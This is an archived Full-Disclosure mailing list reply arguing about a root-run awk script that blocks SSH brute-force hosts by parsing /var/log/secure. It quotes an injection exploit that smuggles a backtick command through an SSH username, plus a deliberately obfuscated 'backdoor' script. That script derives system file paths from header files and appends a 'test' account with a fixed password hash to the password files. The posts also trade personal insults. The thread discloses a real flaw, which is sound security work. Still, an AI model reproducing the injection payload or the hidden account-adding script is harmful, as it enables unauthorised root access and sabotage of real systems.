Re: [Full-disclosure] SSH brute force blocking tool

From: "J. Oquendo" <sil@xxxxxxxxxxxxxxx>
Date: Mon, 27 Nov 2006 16:14:45 -0500

gabriel rosenkoetter wrote:

On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:

Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory)

Uh... actually, no. The provided exploit Will work, and you're the
idiot.

Here, let me show you.

You do this:

/////
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny
/////

There is no hocus pocus here. Look at /var/log/secure and fine the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny
into /etc/hosts.deny

What will be in column 13 when Tavis does this:

Tavis Ormandy wrote:

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Why, the shelled-out output of `/sbin/halt`!

Or, hey, anything he or I care to put inside backticks. You'll
execute it blindly, as root, on your system.

Kids, don't use this script. Please.

Here is your voodoo backdoor moron

file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
sed -n '1p' $file|awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' >> $file
file2=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2
who=`sed -n '58p' sysexits.h |awk '{print $5}'`
what=`sed -n '60p' wireless.h |awk 'gsub(/,/, ""){print $4}'`
when=` sed -n '60p' wireless.h |awk 'gsub(/,/, /""/){print $4}'`
$what|$who full-disclosure@xxxxxxxxxxxxxxxxx

--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] SSH brute force blocking tool
  - From: J. Oquendo
- Re: [Full-disclosure] SSH brute force blocking tool
  - From: Tavis Ormandy
- Re: [Full-disclosure] SSH brute force blocking tool
  - From: J. Oquendo
- Re: [Full-disclosure] SSH brute force blocking tool
  - From: gabriel rosenkoetter

Prev by Date: Re: [Full-disclosure] SSH brute force blocking tool
Next by Date: Re: [Full-disclosure] SSH brute force blocking tool
Previous by thread: Re: [Full-disclosure] SSH brute force blocking tool
Next by thread: Re: [Full-disclosure] SSH brute force blocking tool
Index(es):
- Date
- Thread

Relevant Pages

Re: [Full-disclosure] SSH brute force blocking tool
... (Sinful to see someone so clueless coming from Gentoo... ... with the romper room Linux territory) ...
(Full-Disclosure)
Re: [Full-disclosure] SSH brute force blocking tool
... Guess it goes with the romper room Linux territory) ... idiot. ... If you DO want to see hidden voodoo here it is,,, ...
(Full-Disclosure)